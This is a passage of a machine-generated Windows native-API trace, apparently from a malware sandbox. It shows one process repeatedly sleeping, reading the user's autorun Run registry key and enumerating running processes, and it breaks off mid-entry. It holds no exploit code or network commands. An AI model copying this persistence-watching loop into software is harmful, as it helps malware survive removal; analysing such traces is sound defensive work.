0x0 [0183.743] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.753] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.753] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.753] NtClose (Handle=0x154) returned 0x0 [0183.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.757] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.768] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.768] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.768] NtClose (Handle=0x154) returned 0x0 [0183.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.773] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.784] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.784] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.784] NtClose (Handle=0x154) returned 0x0 [0183.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.788] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.800] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.800] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.800] NtClose (Handle=0x154) returned 0x0 [0183.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.804] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.815] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.815] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.815] NtClose (Handle=0x154) returned 0x0 [0183.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.820] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.831] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.831] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.831] NtClose (Handle=0x154) returned 0x0 [0183.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.834] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.846] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.846] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.846] NtClose (Handle=0x154) returned 0x0 [0183.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.850] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.862] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.862] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.862] NtClose (Handle=0x154) returned 0x0 [0183.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.867] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.880] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.880] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.880] NtClose (Handle=0x154) returned 0x0 [0183.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.884] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.893] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.893] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.893] NtClose (Handle=0x154) returned 0x0 [0183.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.898] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.909] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.910] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.910] NtClose (Handle=0x154) returned 0x0 [0183.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.913] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.925] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.925] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.925] NtClose (Handle=0x154) returned 0x0 [0183.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.929] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.940] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.940] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.940] NtClose (Handle=0x154) returned 0x0 [0183.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.944] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.956] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.956] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.956] NtClose (Handle=0x154) returned 0x0 [0183.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, 